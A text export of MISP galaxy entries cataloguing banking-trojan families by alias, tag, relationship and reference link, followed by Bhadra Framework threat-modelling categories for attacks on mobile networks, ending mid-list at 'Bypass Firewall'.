Dridex leverages redirection attacks designed to send victims to malicious replicas of the banking sites they think they're visiting.

The tag is: *misp-galaxy:banker="Dridex"*

Dridex is also known as:

- Feodo Version D
- Cridex

Dridex has relationships with:
• similar: misp-galaxy:tool="Dridex" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Dridex" with estimative-language:likelihood-probability="likely"

Table 448. Table References

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<tr>
<td><a href="https://blog.malwarebytes.com/detections/trojan-dridex/">https://blog.malwarebytes.com/detections/trojan-dridex/</a></td>
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<td><a href="https://feodotracker.abuse.ch/">https://feodotracker.abuse.ch/</a></td>
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</table>

Gozi

Banking trojan delivered primarily via email (typically malspam) and exploit kits. Gozi 1.0 source leaked in 2010

The tag is: misp-galaxy:banker=“Gozi”

Gozi is also known as:

• Ursnif
• CRM
• Snifula
• Papras

Gozi has relationships with:

• similar: misp-galaxy:tool="Snifula" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Gozi" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Snifula" with estimative-language:likelihood-probability="likely"

Table 449. Table References

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<tr>
<td><a href="https://www.secureworks.com/research/gozi">https://www.secureworks.com/research/gozi</a></td>
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<tr>
<td><a href="https://lokalhost.pl/gozi_tree.txt">https://lokalhost.pl/gozi_tree.txt</a></td>
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</table>

Goziv2

Banking trojan attributed to Project Blitzkrieg targeting U.S. Financial institutions.

The tag is: misp-galaxy:banker=“Goziv2”

Goziv2 is also known as:
• Prinimalka

Table 450. Table References

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<tr>
<td><a href="https://krebsonsecurity.com/tag/gozi-prinimalka/">https://krebsonsecurity.com/tag/gozi-prinimalka/</a></td>
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<td><a href="https://securityintelligence.com/project-blitzkrieg-how-to-block-the-planned-prinimalka-gozi-trojan-attack/">https://securityintelligence.com/project-blitzkrieg-how-to-block-the-planned-prinimalka-gozi-trojan-attack/</a></td>
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<tr>
<td><a href="https://localhost.pl/gozi_tree.txt">https://localhost.pl/gozi_tree.txt</a></td>
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</table>

Gozi ISFB

Banking trojan based on Gozi source. Features include web injects for the victims’ browsers, screenshoting, video recording, transparent redirections, etc. Source leaked ~ end of 2015.

The tag is: `misp-galaxy:banker="Gozi ISFB"`

Gozi ISFB has relationships with:

• similar: `misp-galaxy:malpedia="ISFB"` with estimative-language:likelihood-probability="likely"

Table 451. Table References

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<tr>
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<tbody>
<tr>
<td><a href="https://www.govcert.admin.ch/blog/18/gozi-isfb-when-a-bug-really-is-a-feature">https://www.govcert.admin.ch/blog/18/gozi-isfb-when-a-bug-really-is-a-feature</a></td>
</tr>
<tr>
<td><a href="https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak">https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak</a></td>
</tr>
<tr>
<td><a href="https://localhost.pl/gozi_tree.txt">https://localhost.pl/gozi_tree.txt</a></td>
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</table>

Dreambot

Dreambot is a variant of Gozi ISFB that is spread via numerous exploit kits as well as through malspam email attachments and links.

The tag is: `misp-galaxy:banker="Dreambot"`

Table 452. Table References

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<tr>
<td><a href="https://localhost.pl/gozi_tree.txt">https://localhost.pl/gozi_tree.txt</a></td>
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</table>
IAP

Gozi ISFB variant

The tag is: misp-galaxy:banker="IAP"

IAP has relationships with:

• similar: misp-galaxy:malpedia="ISFB" with estimative-language:likelihood-probability="likely"

Table 453. Table References

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<tbody>
<tr>
<td><a href="https://lokalhost.pl/gozi_tree.txt">https://lokalhost.pl/gozi_tree.txt</a></td>
</tr>
<tr>
<td><a href="http://archive.is/I7hi8#selection-217.0-217.6">http://archive.is/I7hi8#selection-217.0-217.6</a></td>
</tr>
</tbody>
</table>

GozNym

GozNym hybrid takes the best of both the Nymaim and Gozi ISFB. From the Nymaim malware, it leverages the dropper's stealth and persistence; the Gozi ISFB parts add the banking Trojan’s capabilities to facilitate fraud via infected Internet browsers.

The tag is: misp-galaxy:banker="GozNym"

Table 454. Table References

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<tr>
<td><a href="https://lokalhost.pl/gozi_tree.txt">https://lokalhost.pl/gozi_tree.txt</a></td>
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</table>

Zloader Zeus

Zloader is a loader that loads different payloads, one of which is a Zeus module. Delivered via exploit kits and malspam emails.

The tag is: misp-galaxy:banker="Zloader Zeus"

Zloader Zeus is also known as:

• Zeus Terdot

Zloader Zeus has relationships with:

• similar: misp-galaxy:malpedia="Zloader" with estimative-language:likelihood-probability="likely"
**Zeus VM**

Zeus variant that utilizes steganography in image files to retrieve configuration file.

The tag is: *misp-galaxy:banker=“Zeus VM”*

Zeus VM is also known as:

- VM Zeus

Zeus VM has relationships with:

- similar: *misp-galaxy:malpedia="VM Zeus"* with *estimative-language:likelihood-probability="likely"

*Table 456. Table References*

**Zeus Sphinx**

Sphinx is a modular banking trojan that is a commercial offering sold to cybercriminals via underground fraudster boards.

The tag is: *misp-galaxy:banker=“Zeus Sphinx”*

Zeus Sphinx has relationships with:

- similar: *misp-galaxy:malpedia="Zeus Sphinx"* with *estimative-language:likelihood-probability="likely"

*Table 457. Table References*

**Panda Banker**

Zeus like banking trojan that is delivered primarily through malspam emails and exploit kits.
Panda Banker is also known as:

- Zeus Panda

Table 458. Table References

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</table>

**Zeus KINS**

Zeus KINS is a modified version of ZeuS 2.0.8.9. It contains an encrypted version of it’s config in the registry.

The tag is: `misp-galaxy:banker="Zeus KINS"`

Zeus KINS is also known as:

- Kasper Internet Non-Security
- Maple

Zeus KINS has relationships with:

- similar: `misp-galaxy:malpedia="KINS"` with estimative-language:likelihood-probability="likely"

Table 459. Table References

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<tbody>
<tr>
<td><a href="https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/">https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/</a></td>
</tr>
<tr>
<td><a href="https://github.com/nyx0/KINS">https://github.com/nyx0/KINS</a></td>
</tr>
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</table>

**Chthonic**

Chthonic according to Kaspersky is an evolution of Zeus VM. It uses the same encryptor as Andromeda bot, the same encryption scheme as Zeus AES and Zeus V2 Trojans, and a virtual machine similar to that used in ZeusVM and KINS malware.

The tag is: `misp-galaxy:banker="Chthonic"`

Chthonic is also known as:

- Chthonic
Chthonic has relationships with:

- similar: misp-galaxy:malpedia="Chthonic" with estimative-language:likelihood-probability="likely"

**Trickbot**

Trickbot is a bot that is delivered via exploit kits and malspam campaigns. The bot is capable of downloading modules, including a banker module. Trickbot also shares roots with the Dyre banking trojan.

The tag is: misp-galaxy:banker="Trickbot"

Trickbot is also known as:

- Trickster
- Trickloader

Trickbot has relationships with:

- similar: misp-galaxy:tool="Trick Bot" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="TrickBot" with estimative-language:likelihood-probability="likely"

**Dyre**

Dyre is a banking trojan distributed via exploit kits and malspam emails primarily. It has a modular architecture and utilizes man-in-the-browser functionality. It also leverages a backconnect server.
that allows threat actors to connect to a bank website through the victim’s computer.

The tag is: *misp-galaxy:banker=*"Dyre"

Dyre is also known as:

- Dyreza

Dyre has relationships with:

- similar: *misp-galaxy:mitre-malware=*"Dyre - S0024" with estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:malpedia=*"Dyre" with estimative-language:likelihood-probability="likely"

Table 462. Table References

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<tr>
<td><a href="https://www.secureworks.com/research/dyre-banking-trojan">https://www.secureworks.com/research/dyre-banking-trojan</a></td>
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</table>

**Tinba**

Tinba is a very small banking trojan that hooks into browsers and steals login data and sniffs on network traffic. It also uses Man in The Browser (MiTB) and webinjests. Tinba is primarily delivered via exploit kits, malvertising and malspam email campaigns.

The tag is: *misp-galaxy:banker=*"Tinba"

Tinba is also known as:

- Zusy
- TinyBanker
- illi

Tinba has relationships with:

- similar: *misp-galaxy:tool=*"Tinba" with estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:malpedia=*"Tinba" with estimative-language:likelihood-probability="likely"

Table 463. Table References

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<tr>
<td><a href="https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/">https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/</a></td>
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<tr>
<td><a href="http://my.infotex.com/tiny-banker-trojan/">http://my.infotex.com/tiny-banker-trojan/</a></td>
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</tbody>
</table>
Geodo

Geodo is a banking trojan delivered primarily through malspam emails. It is capable of sniffing network activity to steal information by hooking certain network API calls.

The tag is: $misp$-galaxy:banker="Geodo"

Geodo is also known as:

- Feodo Version C
- Emotet

Geodo has relationships with:

- similar: $misp$-galaxy:tool="Emotet" with estimative-language:likelihood-probability="likely"
- similar: $misp$-galaxy:malpedia="Emotet" with estimative-language:likelihood-probability="likely"

Table 464. Table References

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<tr>
<td><a href="https://feodotracker.abuse.ch/">https://feodotracker.abuse.ch/</a></td>
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<td><a href="https://www.forcepoint.com/blog/security-labs/thanks-giving-emotet">https://www.forcepoint.com/blog/security-labs/thanks-giving-emotet</a></td>
</tr>
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</table>

Feodo

Feodo is a banking trojan that utilizes web injects and is also capable of monitoring & manipulating cookies. Version A = Port 8080, Version B = Port 80 It is delivered primarily via exploit kits and malspam emails.

The tag is: $misp$-galaxy:banker="Feodo"

Feodo is also known as:

- Bugat
- Cridex

Feodo has relationships with:
• similar: misp-galaxy:tool="Dridex" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Feodo" with estimative-language:likelihood-probability="likely"

Table 465. Table References

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<tr>
<td><a href="https://securelist.com/dridex-a-history-of-evolution/78531/">https://securelist.com/dridex-a-history-of-evolution/78531/</a></td>
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<tr>
<td><a href="https://feodotracker.abuse.ch/">https://feodotracker.abuse.ch/</a></td>
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</table>

**Ramnit**

Originally not a banking trojan in 2010, Ramnit became a banking trojan after the Zeus source code leak. It is capable of performing Man-in-the-Browser attacks. Distributed primarily via exploit kits.

The tag is: **misp-galaxy:banker="Ramnit"**

Ramnit is also known as:

• Nimnul

Ramnit has relationships with:

• similar: misp-galaxy:botnet="Ramnit" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Ramnit" with estimative-language:likelihood-probability="likely"

Table 466. Table References

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**Qakbot**

Qakbot is a banking trojan that leverages webinjects to steal banking information from victims. It also utilizes DGA for command and control. It is primarily delivered via exploit kits.

The tag is: **misp-galaxy:banker="Qakbot"**

Qakbot is also known as:

• Qbot
• Pinkslipbot
• Akbot

Qakbot has relationships with:

• similar: misp-galaxy:tool="Akbot" with estimative-language:likelihood-probability="likely"
Corebot

Corebot is a modular trojan that leverages a banking module that can perform browser hooking, form grabbing, MitM, webinjection to steal financial information from victims. Distributed primarily via malspam emails and exploit kits.

The tag is: `misp-galaxy:banker="Corebot"`

Corebot has relationships with:

- similar: `misp-galaxy:malpedia="Corebot"` with `estimative-language:likelihood-probability="likely"`

TinyNuke

TinyNuke is a modular banking trojan that includes a HiddenDesktop/VNC server and reverse SOCKS 4 server. It’s main functionality is to make web injections into specific pages to steal user data. Distributed primarily via malspam emails and exploit kits.

The tag is: `misp-galaxy:banker="TinyNuke"`

TinyNuke is also known as:

- NukeBot
- Nuclear Bot
- MicroBankingTrojan
Xbot

TinyNuke has relationships with:

- similar: misp-galaxy:mitre-tool="Xbot - S0298" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Xbot" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="TinyNuke" with estimative-language:likelihood-probability="likely"

Table 469. Table References

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<td><a href="https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/">https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/</a></td>
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<td><a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=4596">http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=4596</a></td>
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Retefe

Retefe is a banking trojan that is distributed by what SWITCH CERT calls the Retefe gang or Operation Emmental. It uses geolocation based targeting. It also leverages fake root certificate and changes the DNS server for domain name resolution in order to display fake banking websites to victims. It is spread primarily through malspam emails.

The tag is: misp-galaxy:banker="Retefe"

Retefe is also known as:

- Tsukuba
- Werdlod

Retefe has relationships with:

- similar: misp-galaxy:malpedia="Retefe (Android)" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Dok" with estimative-language:likelihood-probability="likely"

Table 470. Table References

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<tr>
<td><a href="https://www.govcert.admin.ch/blog/33/the-retefe-saga">https://www.govcert.admin.ch/blog/33/the-retefe-saga</a></td>
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<tr>
<td><a href="https://countuponsecurity.com/2016/02/29/retefe-banking-trojan/">https://countuponsecurity.com/2016/02/29/retefe-banking-trojan/</a></td>
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</tbody>
</table>
ReactorBot

ReactorBot is sometimes mistakenly tagged as Rovnix. ReactorBot is a full fledged modular bot that includes a banking module that has roots with the Carberp banking trojan. Distributed primarily via malspam emails.

The tag is: `misp-galaxy:banker="ReactorBot"

ReactorBot has relationships with:

- similar: `misp-galaxy:malpedia="ReactorBot"` with `estimative-language:likelihood-probability="likely"

Matrix Banker

Matrix Banker is named accordingly because of the Matrix reference in it's C2 panel. Distributed primarily via malspam emails.

The tag is: `misp-galaxy:banker="Matrix Banker"

Matrix Banker has relationships with:

- similar: `misp-galaxy:malpedia="Matrix Banker"` with `estimative-language:likelihood-probability="likely"

Zeus Gameover

Zeus Gameover captures banking credentials from infected computers, then use those credentials to initiate or re-direct wire transfers to accounts overseas that are controlled by the criminals. GameOver has a decentralized, peer-to-peer command and control infrastructure rather than
centralized points of origin. Distributed primarily via malspam emails and exploit kits.

The tag is: *misp-galaxy:banker*="Zeus Gameover"

**Table 473. Table References**

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<tr>
<td><a href="https://heimdalsecurity.com/blog/zeus-gameover/">https://heimdalsecurity.com/blog/zeus-gameover/</a></td>
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<td><a href="https://www.us-cert.gov/ncas/alerts/TA14-150A">https://www.us-cert.gov/ncas/alerts/TA14-150A</a></td>
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**SpyEye**

SpyEye is a similar to the Zeus botnet banking trojan. It utilizes a web control panel for C2 and can perform form grabbing, autofill credit card modules, ftp grabber, pop3 grabber and HTTP basic access authorization grabber. It also contained a Kill Zeus feature which would remove any Zeus infections if SpyEye was on the system. Distributed primarily via exploit kits and malspam emails.

The tag is: *misp-galaxy:banker*="SpyEye"

**Table 474. Table References**

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<tr>
<td><a href="https://www.computerworld.com/article/2509482/security0/spyeye-trojan-defeating-online-banking-defenses.html">https://www.computerworld.com/article/2509482/security0/spyeye-trojan-defeating-online-banking-defenses.html</a></td>
</tr>
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</table>

**Citadel**

Citadel is an offspring of the Zeus banking trojan. Delivered primarily via exploit kits.

The tag is: *misp-galaxy:banker*="Citadel"

Citadel has relationships with:

- similar: *misp-galaxy:malpedia*="Citadel" with *estimative-language:likelihood-probability*="likely"

**Table 475. Table References**

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<tr>
<td><a href="https://krebsonsecurity.com/tag/citadel-trojan/">https://krebsonsecurity.com/tag/citadel-trojan/</a></td>
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</table>
**Atmos**

Atmos is derived from the Citadel banking trojan. Delivered primarily via exploit kits and malspam emails.

The tag is: `misp-galaxy:banker="Atmos"`

**Table 476. Table References**

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<tr>
<td><a href="https://heimdalsecurity.com/blog/security-alert-citadel-trojan-resurfaces-atmos-zeus-legacy/">https://heimdalsecurity.com/blog/security-alert-citadel-trojan-resurfaces-atmos-zeus-legacy/</a></td>
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<td><a href="http://www.xylibox.com/2016/02/citadel-0011-atmos.html">http://www.xylibox.com/2016/02/citadel-0011-atmos.html</a></td>
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**Ice IX**

Ice IX is a bot created using the source code of ZeuS 2.0.8.9. No major improvements compared to ZeuS 2.0.8.9.

The tag is: `misp-galaxy:banker="Ice IX"`

Ice IX has relationships with:

- similar: `misp-galaxy:malpedia="Ice IX"` with `estimative-language:likelihood-probability="likely"`

**Table 477. Table References**

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<tr>
<td><a href="https://securelist.com/ice-ix-not-cool-at-all/29111/">https://securelist.com/ice-ix-not-cool-at-all/29111/</a></td>
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</table>

**Zitmo**

Zeus in the mobile. Banking trojan developed for mobile devices such as Windows Mobile, Blackberry and Android.

The tag is: `misp-galaxy:banker="Zitmo"`

**Table 478. Table References**

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<tr>
<td><a href="https://securelist.com/zeus-in-the-mobile-for-android-10/29258/">https://securelist.com/zeus-in-the-mobile-for-android-10/29258/</a></td>
</tr>
</tbody>
</table>

**Licat**

Banking trojan based on Zeus V2. Murofet is a newer version of Licat found ~end of 2011

The tag is: `misp-galaxy:banker="Licat"`

Licat is also known as:
• Murofet

Licat has relationships with:

• similar: misp-galaxy:malpedia="Murofet" with estimative-language:likelihood-probability="likely"

Table 479. Table References

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<tr>
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Skynet

Skynet is a Tor-powered trojan with DDoS, Bitcoin mining and Banking capabilities. Spread via USENET as per rapid7.

The tag is: misp-galaxy:banker="Skynet"

Table 480. Table References

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<tr>
<td><a href="https://blog.rapid7.com/2012/12/06/skynet-a-tor-powered-botnet-straight-from-reddit/">https://blog.rapid7.com/2012/12/06/skynet-a-tor-powered-botnet-straight-from-reddit/</a></td>
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IcedID

According to X-Force research, the new banking Trojan emerged in the wild in September 2017, when its first test campaigns were launched. Our researchers noted that IcedID has a modular malicious code with modern banking Trojan capabilities comparable to malware such as the Zeus Trojan. At this time, the malware targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites in the U.S. Two major banks in the U.K. are also on the target list the malware fetches.

The tag is: misp-galaxy:banker="IcedID"

IcedID has relationships with:

• similar: misp-galaxy:malpedia="IcedID" with estimative-language:likelihood-probability="likely"

Table 481. Table References

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GratefulPOS

GratefulPOS has the following functions: 1. Access arbitrary processes on the target POS system 2. Scrape track 1 and 2 payment card data from the process(es) 3. Exfiltrate the payment card data via lengthy encoded and obfuscated DNS queries to a hardcoded domain registered and controlled by the perpetrators, similar to that described by Paul Rascagneres in his analysis of FrameworkPOS in 2014[iii], and more recently by Luis Mendieta of Anomoli in analysis of a precursor to this sample.

The tag is: `misp-galaxy:banker="GratefulPOS"`

GratefulPOS has relationships with:

- similar: `misp-galaxy:tool="GratefulPOS"` with `estimative-language:likelihood-probability="likely"

Table 482. Table References

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Dok

A macOS banking trojan that that redirects an infected user’s web traffic in order to extract banking credentials.

The tag is: `misp-galaxy:banker="Dok"

Dok has relationships with:

- similar: `misp-galaxy:malpedia="Retefe (Android)"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Dok"` with `estimative-language:likelihood-probability="likely"

Table 483. Table References

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<tr>
<td><a href="https://objective-see.com/blog/blog_0x25.html#Dok">https://objective-see.com/blog/blog_0x25.html#Dok</a></td>
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downAndExec

Services like Netflix use content delivery networks (CDNs) to maximize bandwidth usage as it gives users greater speed when viewing the content, as the server is close to them and is part of the Netflix CDN. This results in faster loading times for series and movies, wherever you are in the world. But, apparently, the CDNs are starting to become a new way of spreading malware. The attack chain is very extensive, and incorporates the execution of remote scripts (similar in some
respects to the recent “fileless” banking malware trend), plus the use of CDNs for command and control (C&C), and other standard techniques for the execution and protection of malware.

The tag is: `misp-galaxy:banker="downAndExec"`

---

**Smominru**

Since the end of May 2017, we have been monitoring a Monero miner that spreads using the EternalBlue Exploit (CVE-2017-0144). The miner itself, known as Smominru (aka Ismo) has been well-documented, so we will not discuss its post-infection behavior. However, the miner’s use of Windows Management Infrastructure is unusual among coin mining malware. The speed at which mining operations conduct mathematical operations to unlock new units of cryptocurrency is referred to as “hash power”. Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz. The operators had already mined approximately 8,900 Monero (valued this week between $2.8M and $3.6M). Each day, the botnet mined roughly 24 Monero, worth an average of $8,500 this week.

The tag is: `misp-galaxy:banker="Smominru"`

Smominru is also known as:

- Ismo
- Ismo

Smominru has relationships with:

- similar: `misp-galaxy:malpedia="Smominru"` with `estimative-language:likelihood-probability="likely"

---

**DanaBot**

It’s a Trojan that includes banking site web injections and stealer functions. It consists of a downloader component that downloads an encrypted file containing the main DLL. The DLL, in turn, connects using raw TCP connections to port 443 and downloads additional modules (i.e. VNCDLL.dll, StealerDLL.dll, ProxyDLL.dll)

The tag is: `misp-galaxy:banker="DanaBot"`
DanaBot has relationships with:

- similar: misp-galaxy:malpedia="DanaBot" with estimative-language:likelihood-probability="likely"

**Table 486. Table References**

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**Backswap**

The banker is distributed through malicious email spam campaigns. Instead of using complex process injection methods to monitor browsing activity, the malware hooks key Windows message loop events in order to inspect values of the window objects for banking activity. The payload is delivered as a modified version of a legitimate application that is partially overwritten by the malicious payload.

The tag is: **misp-galaxy:banker="Backswap"**

**Table 487. Table References**

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**Bebloh**

The tag is: **misp-galaxy:banker="Bebloh"**

Bebloh is also known as:

- URLZone
- Shiotob

Bebloh has relationships with:

- similar: misp-galaxy:malpedia="UrlZone" with estimative-language:likelihood-probability="likely"

**Table 488. Table References**

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Banjori

The tag is: `misp-galaxy:banker="Banjori"`

Banjori is also known as:

- MultiBanker 2
- BankPatch
- BackPatcher

Banjori has relationships with:

- similar: `misp-galaxy:malpedia="Banjori"` with `estimative-language:likelihood-probability="likely"`

Table 489. Table References

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<tr>
<td><a href="https://www.johannesbader.ch/2015/02/the-dga-of-banjori/">https://www.johannesbader.ch/2015/02/the-dga-of-banjori/</a></td>
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Qadars

The tag is: `misp-galaxy:banker="Qadars"`

Qadars has relationships with:

- similar: `misp-galaxy:malpedia="Qadars"` with `estimative-language:likelihood-probability="likely"`

Table 490. Table References

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Sisron

The tag is: `misp-galaxy:banker="Sisron"`

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<td><a href="https://www.johannesbader.ch/2016/06/the-dga-of-sisron/">https://www.johannesbader.ch/2016/06/the-dga-of-sisron/</a></td>
</tr>
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</table>
Ranbyus

The tag is: misp-galaxy:banker="Ranbyus"

Ranbyus has relationships with:

- similar: misp-galaxy:malpedia="Ranbyus" with estimative-language:likelihood-probability="likely"

Table 492. Table References

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<td><a href="https://www.johannesbader.ch/2016/06/the-dga-of-sisron/">https://www.johannesbader.ch/2016/06/the-dga-of-sisron/</a></td>
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Fobber

The tag is: misp-galaxy:banker="Fobber"

Fobber has relationships with:

- similar: misp-galaxy:malpedia="Fobber" with estimative-language:likelihood-probability="likely"

Table 493. Table References

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Karius

Trojan under development and already being distributed through the RIG Exploit Kit. Observed code similarities with other well-known bankers such as Ramnit, Vawtrak and TrickBot. Karius works in a rather traditional fashion to other banking malware and consists of three components (injector32\64.exe, proxy32\64.dll and mod32\64.dll), these components essentially work together to deploy webinjects in several browsers.

The tag is: misp-galaxy:banker="Karius"

Karius has relationships with:

- similar: misp-galaxy:malpedia="Karius" with estimative-language:likelihood-probability="likely"

Table 494. Table References

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<tr>
<td><a href="https://research.checkpoint.com/banking-trojans-development/">https://research.checkpoint.com/banking-trojans-development/</a></td>
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</table>
Kronos

Kronos was a type of banking malware first reported in 2014. It was sold for $7000. As of September 2015, a renew version was reconnecting with infected bots and sending them a brand new configuration file against U.K. banks and one bank in India. Similar to Zeus it was focused on stealing banking login credentials from browser sessions. A new version of this malware appears to have been used in 2018, the main difference is that the 2018 edition uses Tor-hosted C&C control panels.

The tag is: misp-galaxy:banker="Kronos"

Kronos has relationships with:

• similar: misp-galaxy:malpedia="Kronos" with estimative-language:likelihood-probability="likely"

Table 495. Table References

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CamuBot

A newly discovered banking Trojan departs from the regular tactics observed by malware researchers by choosing visible installation and by adding social engineering components. CamuBot appeared last month in Brazil targeting companies and organizations from the public sector. The victim is the one installing the malware, at the instructions of a human operator that pretends to be a bank employee.

The tag is: misp-galaxy:banker="CamuBot"

CamuBot has relationships with:

• similar: misp-galaxy:malpedia="CamuBot" with estimative-language:likelihood-probability="likely"

Table 496. Table References

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Dark Tequila

Dark Tequila has primarily been designed to steal victims' financial information from a long list of online banking sites, as well as login credentials to popular websites, ranging from code versioning repositories to public file storage accounts and domain registrars.

The tag is: `misp-galaxy:banker="Dark Tequila"`

Table 497. Table References

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Bhadra Framework

Bhadra Threat Modeling Framework.

Bhadra Framework is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

Siddharth Prakash Rao - Silke Holtmanns - Tuomas Aura

Attacks from UE

"Attacks from UE" refers to any technique that involves the attacks launched by the software or hardware components of the user equipment to send malicious traffic into the mobile network.

The tag is: `misp-galaxy:bhadra-framework="Attacks from UE"`

SIM-based attacks

The "SIM-based attacks" are the techniques that involve any physical smart cards, namely SIM from 2G, USIM from 3G, and UICC from 4G networks.

The tag is: `misp-galaxy:bhadra-framework="SIM-based attacks"`

Attacks from radio access network

The "attacks from radio access network" are the techniques where an adversary with radio capabilities impersonates the mobile network to the UE (or vice versa) and becomes a man-in-the-middle.

The tag is: `misp-galaxy:bhadra-framework="Attacks from radio access network"`
Attacks from other mobile network

The "attacks from other mobile networks" and the "attacks with physical access to transport network" techniques can be conducted by evil mobile operators, law enforcement agencies for legal interception and human insiders with access to network nodes.

The tag is: `misp-galaxy:bhadra-framework="Attacks from other mobile network"`

Attacks with access to transport network

The "attacks from other mobile networks" and the "attacks with physical access to transport network" techniques can be conducted by evil mobile operators, law enforcement agencies for legal interception and human insiders with access to network nodes.

The tag is: `misp-galaxy:bhadra-framework="Attacks with access to transport network"`

Attacks from IP-based network

The "attacks from IP-based attacks" techniques mostly are launched from the service and application network, which allows non operator entities to infuse malicious traffic into an operator's network.

The tag is: `misp-galaxy:bhadra-framework="Attacks from IP-based network"`

Insider attacks and human errors

The "insider attacks and human errors" technique involve the intentional attacks and unintentional mistakes from human insiders with access to any component of the mobile communication ecosystem.

The tag is: `misp-galaxy:bhadra-framework="Insider attacks and human errors"`

Infected UE hardware or software

Retaining the foothold gained on the target system through the initial access by infecting UE hardware or software.

The tag is: `misp-galaxy:bhadra-framework="Infected UE hardware or software"`

Infected SIM cards

Retaining the foothold gained on the target system through the initial access by infecting SIM cards.

The tag is: `misp-galaxy:bhadra-framework="Infected SIM cards"`
Spoofed radio network

Retaining the foothold gained on the target system through the initial access by radio network spoofing.

The tag is: misp-galaxy:bhadra-framework="Spoofed radio network"

Infecting network nodes

Retaining the foothold gained on the target system through the initial access by infecting network nodes.

The tag is: misp-galaxy:bhadra-framework="Infecting network nodes"

Covert channels

Retaining the foothold gained on the target system through the initial access via covert channels.

The tag is: misp-galaxy:bhadra-framework="Covert channels"

Port scanning or sweeping

"Port scanning or sweeping" techniques to probe servers or hosts with open ports.

The tag is: misp-galaxy:bhadra-framework="Port scanning or sweeping"

Perimeter mapping

"perimeter mapping" techniques such as command-line utilities (e.g., nmap and whois), web-based lookup tools and official APIs provided by the Internet registrars that assign the ASNs using a wide range of publicly available sources.

The tag is: misp-galaxy:bhadra-framework="Perimeter mapping"

Threat intelligence gathering

"Threat intelligence gathering" using dedicated search engines (such as Censys, Shodan) to gather information about vulnerable devices or networks, or using advanced search options of traditional search engines.

The tag is: misp-galaxy:bhadra-framework="Threat intelligence gathering"

CN-specific scanning

"CN-specific scanning", used to scan nodes that are interconnected with protocols specific to the mobile communication domain (GTP, SCTP).
Internal resource search

"Internal resource search" refers to an insider with access to provider internal databases abusing the information as a discovery tactic.

The tag is: misp-galaxy:bhadra-framework="Internal resource search"

UE knocking

"UE knocking" refers to the technique that scans User Equipment, similarly to how IP endpoints and core network nodes are scanned or mapped.

The tag is: misp-galaxy:bhadra-framework="UE knocking"

Exploit roaming agreements

"Exploit roaming agreements" is a technique exploited by evil mobile operators. Despite communication with operators is dependent on a roaming agreement being in place, an attacker that has gained a foothold with one operator, it can abuse the roaming agreements in place for lateral movement with all adjacent operators with agreements in place.

The tag is: misp-galaxy:bhadra-framework="Exploit roaming agreements"

Abusing interworking functionalities

"Abusing Inter-working functionalities" is a technique for adversaries to move between networks of different generations laterally

The tag is: misp-galaxy:bhadra-framework="Abusing interworking functionalities"

Exploit platform & service-specific vulnerabilities

Once an attacker has gained a foothold in an operator, it can conduct privilege escalation and process injection for gaining administrative rights, password cracking of valid user accounts on the nodes, exploit vulnerabilities in databases and file systems, and take advantage of improper configurations of routers and switches.

The tag is: misp-galaxy:bhadra-framework="Exploit platform & service-specific vulnerabilities"

SS7-based-attacks

Attacks abusing the SS7 protocol.

The tag is: misp-galaxy:bhadra-framework="SS7-based-attacks"
Diameter-based attacks

Attacks abusing the Diameter protocol.

The tag is: misp-galaxy:bhadra-framework="Diameter-based attacks"

GTP-based attacks

Attacks abusing the GTP protocol.

The tag is: misp-galaxy:bhadra-framework="GTP-based attacks"

DNS-based attacks

DNS based attacks.

The tag is: misp-galaxy:bhadra-framework="DNS-based attacks"

Pre-AKA attacks

Attack techniques that take place during the unencrypted communication that occurs prior to the AKA protocol.

The tag is: misp-galaxy:bhadra-framework="Pre-AKA attacks"

Security audit camouflage

The operating systems, software, and services used on the network nodes are prone to security vulnerabilities and installation of unwanted malware. Although operators conduct routine security audits to track and patch the vulnerabilities or remove the malware from the infected nodes, their effectiveness is not known to the public. Any means by which an adversary can remain undetected from such audits are referred to as the security audit camouflage technique.

The tag is: misp-galaxy:bhadra-framework="Security audit camouflage"

Blacklist evasion

Mobile operators employ several defenses in terms of securing their network traffic. For instance, operators maintain a whitelist of IPs and GTs of nodes from their own infrastructure and their partner operators (as agreed in IR 21), and traffic from only these nodes are processed. Similarly, a blacklist is also maintained to control spam due to configuration errors and malicious traffic. Anything from the blacklist is banned from entering the operator's network. Such defense mechanisms may defend against unsolicited traffic from external networks (e.g., from the public Internet and SAN), but it barely serves its purpose in the case of attacks from inter-operator communications. Since most of the communication protocols are unauthenticated in nature, an attacker with knowledge of identifiers of the allowed nodes (i.e. gained during the discovery phase) can impersonate their identity. We call it the blacklist evasion technique.
Middlebox misconfiguration exploits

NAT middleboxes are used for separating private networks of mobile operators from public Internet works as the second line of defense. However, studies have shown that the middleboxes deployed by operators are prone to misconfigurations that allow adversaries to infiltrate malicious traffic into mobile networks e.g., by spoofing the IP headers. Some of the other NAT vulnerabilities lie in IPv4-to-IPv6 address mapping logic, which can be exploited by adversaries to exhaust the resources, wipe out the mapping, or to assist with blacklist evasion. Adversaries use such middlebox misconfiguration exploit techniques to launch denial-of-service or over-billing attacks.

Bypass Firewall

